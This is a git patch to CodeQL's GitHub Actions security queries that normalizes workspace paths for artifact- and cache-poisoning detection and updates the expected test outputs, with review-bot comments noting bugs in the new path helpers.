.github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | 
@@ -45,6 +51,9 @@ nodes | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | semmle.label | sed -f config foo.md > bar.md\n | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | semmle.label | python test.py | +| .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | semmle.label | make snapshot | subpaths #select | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | 
@@ -62,3 +71,5 @@ subpaths | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | sed -f config foo.md > bar.md\n | | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | python test.py | +| .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Potential artifact poisoning in $@, which may be controlled by an external user. 
| .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Uses Step | +| .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | make snapshot | diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected index 431386fae068..079a89a498c5 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected @@ -1,4 +1,7 @@ edges +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | provenance | | +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | provenance | | +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | provenance | | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | provenance | | | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | provenance | | | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | provenance | | 
@@ -14,7 +17,10 @@ edges | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | | +| .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | provenance | | +| .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | provenance | | nodes +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | 
@@ -45,5 +51,8 @@ nodes | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | semmle.label | sed -f config foo.md > bar.md\n | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | semmle.label | python test.py | +| .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | semmle.label | make snapshot | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 006f365ae05c..9358d65e8f4b 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected 
@@ -1,6 +1,12 @@ edges | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/actions/dangerous-git-checkout/action.yml:11:7:12:18 | Run Step | | .github/actions/dangerous-git-checkout/action.yml:11:7:12:18 | Run Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/actions/download-artifact-2/action.yaml:25:7:29:4 | Run Step | +| .github/actions/download-artifact-2/action.yaml:25:7:29:4 | Run Step | .github/actions/download-artifact-2/action.yaml:29:7:32:18 | Run Step | +| .github/actions/download-artifact-2/action.yaml:29:7:32:18 | Run Step | .github/workflows/artifactpoisoning92.yml:19:9:25:6 | Run Step: metadata | +| .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | .github/actions/download-artifact/action.yaml:25:7:29:4 | Run Step | +| .github/actions/download-artifact/action.yaml:25:7:29:4 | Run Step | .github/actions/download-artifact/action.yaml:29:7:32:18 | Run Step | +| .github/actions/download-artifact/action.yaml:29:7:32:18 | Run Step | .github/workflows/artifactpoisoning91.yml:19:9:25:6 | Run Step: metadata | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/formal.yml:14:9:19:6 | Uses Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/formal.yml:19:9:25:6 | Run Step | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/formal.yml:19:9:25:6 | Run Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/formal.yml:25:9:70:20 | Run Step | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | 
@@ -35,6 +41,18 @@ edges | .github/workflows/artifactpoisoning82.yml:11:9:14:6 | Uses Step | .github/workflows/artifactpoisoning82.yml:14:9:16:6 | Run Step | | .github/workflows/artifactpoisoning82.yml:14:9:16:6 | Run Step | .github/workflows/artifactpoisoning82.yml:16:9:22:2 | Uses Step | | .github/workflows/artifactpoisoning82.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning82.yml:31:9:31:28 | Run Step | +| .github/workflows/artifactpoisoning91.yml:17:9:18:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:18:9:19:6 | Uses Step | +| .github/workflows/artifactpoisoning91.yml:18:9:19:6 | Uses Step | .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | +| .github/workflows/artifactpoisoning91.yml:18:9:19:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:19:9:25:6 | Run Step: metadata | +| .github/workflows/artifactpoisoning91.yml:19:9:25:6 | Run Step: metadata | .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | +| .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:28:9:29:6 | Uses Step | +| .github/workflows/artifactpoisoning91.yml:28:9:29:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:29:9:29:27 | Run Step | +| .github/workflows/artifactpoisoning92.yml:17:9:18:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:18:9:19:6 | Uses Step | +| .github/workflows/artifactpoisoning92.yml:18:9:19:6 | Uses Step | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | +| .github/workflows/artifactpoisoning92.yml:18:9:19:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:19:9:25:6 | Run Step: metadata | +| .github/workflows/artifactpoisoning92.yml:19:9:25:6 | Run Step: metadata | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | +| .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | +| 
.github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:9:29:27 | Run Step | | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:27:9:32:6 | Uses Step | | .github/workflows/auto_ci.yml:27:9:32:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:37:9:40:6 | Run Step | From 9d26a8da26db1ed4c21939f4c4442ab319108a42 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 27 Sep 2024 18:22:35 +0200 Subject: [PATCH 545/707] Improve path checks for Artifact and Cache poisoning queries --- ql/lib/codeql/actions/Ast.qll | 2 + ql/lib/codeql/actions/Helper.qll | 27 +++++++ ql/lib/codeql/actions/ast/internal/Ast.qll | 12 ++++ .../security/ArtifactPoisoningQuery.qll | 70 ++++++++++--------- .../actions/security/CachePoisoningQuery.qll | 10 ++- .../actions/security/PoisonableSteps.qll | 10 +-- .../security/UntrustedCheckoutQuery.qll | 18 ++--- .../CWE-349/CachePoisoningViaDirectCache.ql | 25 +------ .../.github/workflows/direct_cache6.yml | 15 +--- .../.github/workflows/neg_direct_cache4.yml | 23 ++++++ .../.github/workflows/neg_direct_cache5.yml | 23 ++++++ .../CachePoisoningViaDirectCache.expected | 14 ++-- .../CachePoisoningViaPoisonableStep.expected | 12 ++-- 13 files changed, 163 insertions(+), 98 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache4.yml create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache5.yml diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index a1651eedc47d..17b0dab4ee67 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll 
@@ -289,6 +289,8 @@ class Run extends Step instanceof RunImpl { ScalarValue getScriptScalar() { result = super.getScriptScalar() } Expression getAnScriptExpr() { result = super.getAnScriptExpr() } + + string getWorkingDirectory() { result = super.getWorkingDirectory() } } abstract class SimpleReferenceExpression extends AstNode instanceof SimpleReferenceExpressionImpl { diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll index 9356950f5717..f9fa108ec3a2 100644 --- a/ql/lib/codeql/actions/Helper.qll +++ b/ql/lib/codeql/actions/Helper.qll @@ -283,3 +283,30 @@ string getRepoRoot() { result = "" ) } + +bindingset[path] +string normalizePath(string path) { + exists(string trimmed_path | trimmed_path = trimQuotes(path) | + // ./foo -> GITHUB_WORKSPACE/foo + if path.indexOf("./") = 0 + then result = path.replaceAll("./", "GITHUB_WORKSPACE/") + else + // GITHUB_WORKSPACE/foo -> GITHUB_WORKSPACE/foo + if path.indexOf("GITHUB_WORKSPACE/") = 0 + then result = path + else + // foo -> GITHUB_WORKSPACE/foo + if path.regexpMatch("^[^/~].*") + then result = "GITHUB_WORKSPACE/" + path.regexpReplaceAll("/$", "") + else + // ~/foo -> ~/foo + // /foo -> /foo + result = path + ) +} + +/** + * Holds if the path cache_path is a subpath of the path untrusted_path. + */ +bindingset[subpath, path] +predicate isSubpath(string subpath, string path) { subpath.substring(0, path.length()) = path } diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 154d466ab7df..5361943331b2 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll 
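Review bot: The new public `getWorkingDirectory()` on `Run` has no QLDoc, unlike the `RunImpl` method it forwards to later in this patch, so a query author cannot see from `Ast.qll` that the result is already rewritten to the `GITHUB_WORKSPACE/` convention and has a fallback. Suggest `/** Gets the working directory of this run step, with a leading "./" rewritten to "GITHUB_WORKSPACE/"; defaults to "GITHUB_WORKSPACE/" when "working-directory" is unset. */` above it. The `Run` class continues outside the hunk.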
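Review bot: `trimmed_path` is bound to `trimQuotes(path)` but every branch of `normalizePath` reads `path`, so the quote stripping never takes effect; each `path` inside the branches should be `trimmed_path`. The first branch's `replaceAll("./", ...)` is also unanchored and rewrites every `./` in the string (`./a/../b` becomes `GITHUB_WORKSPACE/a/.GITHUB_WORKSPACE/b`), so use the anchored form `RunImpl.getWorkingDirectory` already uses: `then result = trimmed_path.regexpReplaceAll("^\\./", "GITHUB_WORKSPACE/")`. The trailing `/` is stripped only in the bare-relative branch, so `results/` normalizes to `GITHUB_WORKSPACE/results` while `./results/` normalizes to `GITHUB_WORKSPACE/results/`, and `isSubpath` then cannot relate the two — a false negative the removed `controlledCachePath` (which stripped the trailing `/` on both sides) did not have; `isSubpath` is also a raw prefix test with no separator boundary, so `GITHUB_WORKSPACE/results-old` passes as a subpath of `GITHUB_WORKSPACE/results`. Its QLDoc still names the old `cache_path`/`untrusted_path` parameters. The rewrite below makes the subpath test tolerant of a trailing `/` and boundary-aware without touching the `GITHUB_WORKSPACE/` constants the callers compare against.
```ql
/**
 * Holds if `subpath` is `path` itself or lies beneath it. A trailing `/` on
 * either side is ignored and the match must end on a path-separator boundary.
 */
bindingset[subpath, path]
predicate isSubpath(string subpath, string path) {
  exists(string sub, string dir |
    sub = subpath.regexpReplaceAll("/$", "") and
    dir = path.regexpReplaceAll("/$", "")
  |
    sub = dir or sub.indexOf(dir + "/") = 0
  )
}
```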
@@ -1317,6 +1317,18 @@ class RunImpl extends StepImpl { override string toString() { if exists(this.getId()) then result = "Run Step: " + this.getId() else result = "Run Step" } + + /** Gets the working directory for this `runs` mapping. */ + string getWorkingDirectory() { + if exists(n.lookup("working-directory").(YamlString).getValue()) + then + result = + n.lookup("working-directory") + .(YamlString) + .getValue() + .regexpReplaceAll("^\\./", "GITHUB_WORKSPACE/") + else result = "GITHUB_WORKSPACE/" + } } /** diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index 236cc4d80914..ebe22140be24 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll @@ -35,7 +35,9 @@ class GitHubDownloadArtifactActionStep extends UntrustedArtifactDownloadStep, Us } override string getPath() { - if exists(this.getArgument("path")) then result = this.getArgument("path") else result = "" + if exists(this.getArgument("path")) + then result = normalizePath(this.getArgument("path")) + else result = "GITHUB_WORKSPACE/" } } @@ -79,11 +81,11 @@ class DownloadArtifactActionStep extends UntrustedArtifactDownloadStep, UsesStep override string getPath() { if exists(this.getArgument(["path", "download_path"])) - then result = this.getArgument(["path", "download_path"]) + then result = normalizePath(this.getArgument(["path", "download_path"])) else if exists(this.getArgument("paths")) - then result = this.getArgument("paths").splitAt(" ") - else result = "" + then result = normalizePath(this.getArgument("paths").splitAt(" ")) + else result = "GITHUB_WORKSPACE/" } } 
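Review bot: `getWorkingDirectory` rewrites only a leading `./`, so a relative `working-directory: src` yields `src` while every other path produced in this patch goes through `normalizePath` and yields `GITHUB_WORKSPACE/src`; an `isSubpath("src", "GITHUB_WORKSPACE/")` check can therefore never hold for such a step. If `Helper.qll` is importable from this internal module, `result = normalizePath(n.lookup("working-directory").(YamlString).getValue())` (or the same three-branch logic inlined) would keep the two representations aligned. Job- and workflow-level `defaults.run.working-directory` are not consulted here either, so unless that is handled elsewhere the `GITHUB_WORKSPACE/` fallback is wrong for workflows that set them; a `// TODO: honour defaults.run.working-directory` on the else branch would keep that visible. `RunImpl` continues outside the hunk.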
@@ -114,8 +116,8 @@ class LegitLabsDownloadArtifactActionStep extends UntrustedArtifactDownloadStep, override string getPath() { if exists(this.getArgument("path")) - then result = this.getArgument("path") - else result = "./artifacts" + then result = normalizePath(this.getArgument("path")) + else result = "GITHUB_WORKSPACE/artifacts" } } @@ -161,14 +163,14 @@ class ActionsGitHubScriptDownloadStep extends UntrustedArtifactDownloadStep, Use .regexpMatch(unzipRegexp() + unzipDirArgRegexp()) then result = - trimQuotes(this.getAFollowingStep() - .(Run) - .getScript() - .splitAt("\n") - .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2)) + normalizePath(trimQuotes(this.getAFollowingStep() + .(Run) + .getScript() + .splitAt("\n") + .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2))) else if this.getAFollowingStep().(Run).getScript().splitAt("\n").regexpMatch(unzipRegexp()) - then result = "" + then result = "GITHUB_WORKSPACE/" else none() } } @@ -197,18 +199,20 @@ class GHRunArtifactDownloadStep extends UntrustedArtifactDownloadStep, Run { script.splitAt("\n").regexpMatch(unzipRegexp() + unzipDirArgRegexp()) then result = - trimQuotes(script.splitAt("\n").regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2)) or + normalizePath(trimQuotes(script + .splitAt("\n") + .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2))) or result = - trimQuotes(this.getAFollowingStep() - .(Run) - .getScript() - .splitAt("\n") - .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2)) + normalizePath(trimQuotes(this.getAFollowingStep() + .(Run) + .getScript() + .splitAt("\n") + .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2))) else if this.getAFollowingStep().(Run).getScript().splitAt("\n").regexpMatch(unzipRegexp()) or script.splitAt("\n").regexpMatch(unzipRegexp()) - then result = "" + then result = "GITHUB_WORKSPACE/" else none() } } 
@@ -244,14 +248,16 @@ class DirectArtifactDownloadStep extends UntrustedArtifactDownloadStep, Run { .regexpMatch(unzipRegexp() + unzipDirArgRegexp()) then result = - trimQuotes(script.splitAt("\n").regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2)) or + normalizePath(trimQuotes(script + .splitAt("\n") + .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2))) or result = - trimQuotes(this.getAFollowingStep() - .(Run) - .getScript() - .splitAt("\n") - .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2)) - else result = "" + normalizePath(trimQuotes(this.getAFollowingStep() + .(Run) + .getScript() + .splitAt("\n") + .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2))) + else result = "GITHUB_WORKSPACE/" } } @@ -268,18 +274,16 @@ class ArtifactPoisoningSink extends DataFlow::Node { ( // Check if the poisonable step is a local script execution step // and the path of the command or script matches the path of the downloaded artifact + isSubpath(poisonable.(LocalScriptExecutionRunStep).getPath(), download.getPath()) + or // Checking the path for non local script execution steps is very difficult not poisonable instanceof LocalScriptExecutionRunStep - or - // TODO: account for Run's working directory - poisonable - .(LocalScriptExecutionRunStep) - .getCommand() - .matches(["./", ""] + download.getPath() + "%") + // Its not easy to extract the path from a non-local script execution step so skipping this check for now + // and isSubpath(poisonable.(Run).getWorkingDirectory(), download.getPath()) ) or poisonable.(UsesStep) = this.asExpr() and - download.getPath() = "" + download.getPath() = "GITHUB_WORKSPACE/" ) } diff --git a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll index 56002cb2b165..a0113beed469 100644 --- a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll 
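Review bot: The new `isSubpath(poisonable.(LocalScriptExecutionRunStep).getPath(), download.getPath())` check compares a script path that `LocalScriptExecutionRunStep.getPath()` (PoisonableSteps.qll hunk) always resolves against `GITHUB_WORKSPACE/`, ignoring the step's `working-directory` that this same patch exposes through `Run.getWorkingDirectory()`; a `run: ./build.sh` under `working-directory: artifacts` resolves to `GITHUB_WORKSPACE/build.sh` and is never related to an artifact downloaded into `artifacts/`, a false negative. Resolving relative script paths against `this.getWorkingDirectory()` inside `LocalScriptExecutionRunStep.getPath()` would fix this check and the cache-poisoning callers at once. The commented-out `// and isSubpath(poisonable.(Run).getWorkingDirectory(), download.getPath())` reads as dead code a later reader cannot tell apart from intent; either enable it or replace it with a one-line `// TODO` saying what is skipped and why. The `ArtifactPoisoningSink` characteristic predicate starts outside the hunk.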
@@ -51,13 +51,17 @@ abstract class CacheWritingStep extends Step { class CacheActionUsesStep extends CacheWritingStep, UsesStep { CacheActionUsesStep() { this.getCallee() = "actions/cache" } - override string getPath() { result = this.(UsesStep).getArgument("path").splitAt("\n") } + override string getPath() { + result = normalizePath(this.(UsesStep).getArgument("path").splitAt("\n")) + } } class CacheActionSaveUsesStep extends CacheWritingStep, UsesStep { CacheActionSaveUsesStep() { this.getCallee() = "actions/cache/save" } - override string getPath() { result = this.(UsesStep).getArgument("path").splitAt("\n") } + override string getPath() { + result = normalizePath(this.(UsesStep).getArgument("path").splitAt("\n")) + } } class SetupRubyUsesStep extends CacheWritingStep, UsesStep { @@ -66,5 +70,5 @@ class SetupRubyUsesStep extends CacheWritingStep, UsesStep { this.getArgument("bundler-cache") = "true" } - override string getPath() { result = "vendor/bundle" } + override string getPath() { result = normalizePath("vendor/bundle") } } diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index 5dd0081f61e9..67bbfa2a4fea 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll 
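Review bot: `getArgument("path").splitAt("\n")` feeds each raw line of the multi-line `path:` value into `normalizePath`, and `actions/cache` path lists are commonly written as an indented block scalar; if the YAML layer preserves that indentation, a line `  results/pip` becomes `GITHUB_WORKSPACE/  results/pip`, which `isSubpath` then never matches (false negative), and a trailing newline yields an empty entry. Trimming each line first, `result = normalizePath(this.(UsesStep).getArgument("path").splitAt("\n").trim())`, covers both `CacheActionUsesStep` and `CacheActionSaveUsesStep` in this hunk. Whether `getArgument` already strips the indentation is not visible here, so confirm against a block-scalar test case before relying on it.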
@@ -36,18 +36,18 @@ class JavascriptImportnUsesStep extends PoisonableStep, UsesStep { } class LocalScriptExecutionRunStep extends PoisonableStep, Run { - string cmd; + string path; LocalScriptExecutionRunStep() { - exists(string line, string regexp, int command_group | + exists(string line, string regexp, int path_group | line = this.getScript().splitAt("\n").trim() | - poisonableLocalScriptsDataModel(regexp, command_group) and - cmd = line.regexpCapture(regexp, command_group) + poisonableLocalScriptsDataModel(regexp, path_group) and + path = line.regexpCapture(regexp, path_group) ) } - string getCommand() { result = cmd } + string getPath() { result = normalizePath(path.splitAt(" ")) } } class LocalActionUsesStep extends PoisonableStep, UsesStep { diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index df3e1e4d8a2e..100a9c5dd5d4 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -151,12 +151,6 @@ predicate containsHeadRef(string s) { ) } -private string getStepCWD() { - // TODO: This should be the path of the git command. - // Read if from the step's CWD, workspace or look for a cd command. - result = "?" -} - /** Checkout of a Pull Request HEAD */ abstract class PRHeadCheckoutStep extends Step { abstract string getPath(); @@ -208,7 +202,7 @@ class ActionsMutableRefCheckout extends MutableRefCheckoutStep instanceof UsesSt override string getPath() { if exists(this.(UsesStep).getArgument("path")) then result = this.(UsesStep).getArgument("path") - else result = "?" + else result = "GITHUB_WORKSPACE/" } } @@ -252,7 +246,7 @@ class ActionsSHACheckout extends SHACheckoutStep instanceof UsesStep { override string getPath() { if exists(this.(UsesStep).getArgument("path")) then result = this.(UsesStep).getArgument("path") - else result = "?" + else result = "GITHUB_WORKSPACE/" } } 
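Review bot: `getPath()` splits the captured group on single spaces and normalizes every token, so if a `poisonableLocalScriptsDataModel` pattern captures a command tail such as `./run.sh --flag`, `--flag` also becomes `GITHUB_WORKSPACE/--flag` and an unrelated path in a later argument can satisfy `isSubpath` (false positive); what the group captures is defined in the data model outside this hunk, so confirm it is a single path and otherwise keep only the first token. Splitting on one space also misses tab-separated or quoted paths containing spaces, which the `trim()` on the line does not address. A one-line QLDoc, `/** Gets the normalized path of the local script executed by this step (one result per space-separated token). */`, would make the multi-valued behaviour explicit to callers.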
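Review bot: `ActionsMutableRefCheckout.getPath()` and `ActionsSHACheckout.getPath()` (the `@@ -252` hunk on the same line) now fall back to the normalized `GITHUB_WORKSPACE/` but still return the raw `path` argument when it is set, so a checkout with `path: results` yields `results` while `CacheActionUsesStep.getPath()` yields `GITHUB_WORKSPACE/results`; the `isSubpath` check in CachePoisoningViaDirectCache.ql then misses exactly the case where the cache directory is the checkout directory. Both overrides should use the same helper as the rest of the patch: `then result = normalizePath(this.(UsesStep).getArgument("path"))`. The enclosing classes start outside the hunks.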
@@ -277,7 +271,7 @@ class GitMutableRefCheckout extends MutableRefCheckoutStep instanceof Run { ) } - override string getPath() { result = getStepCWD() } + override string getPath() { result = this.(Run).getWorkingDirectory() } } /** Checkout of a Pull Request HEAD ref using git within a Run step */ @@ -298,7 +292,7 @@ class GitSHACheckout extends SHACheckoutStep instanceof Run { ) } - override string getPath() { result = getStepCWD() } + override string getPath() { result = this.(Run).getWorkingDirectory() } } /** Checkout of a Pull Request HEAD ref using gh within a Run step */ @@ -321,7 +315,7 @@ class GhMutableRefCheckout extends MutableRefCheckoutStep instanceof Run { ) } - override string getPath() { result = getStepCWD() } + override string getPath() { result = this.(Run).getWorkingDirectory() } } /** Checkout of a Pull Request HEAD ref using gh within a Run step */ @@ -341,5 +335,5 @@ class GhSHACheckout extends SHACheckoutStep instanceof Run { ) } - override string getPath() { result = getStepCWD() } + override string getPath() { result = this.(Run).getWorkingDirectory() } } diff --git a/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql b/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql index bda8224925ec..91bb4d3bc5a3 100644 --- a/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql +++ b/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql 
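Review bot: The four `getPath()` overrides now return `this.(Run).getWorkingDirectory()`, which is where the script starts, not necessarily where the checkout lands: if these classes match clone forms with an explicit target directory, or the script changes directory before the git/gh command, the untrusted code ends up elsewhere — exactly the gap the removed `getStepCWD` TODO tracked. Because `isSubpath` is a prefix test, reporting the working directory is only conservative when the real target is beneath it; a `cd ..` breaks that. Keep the limitation visible on these overrides, e.g. `// TODO: account for an explicit clone target directory or a cd in the script`, so it is not lost with the deleted predicate.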
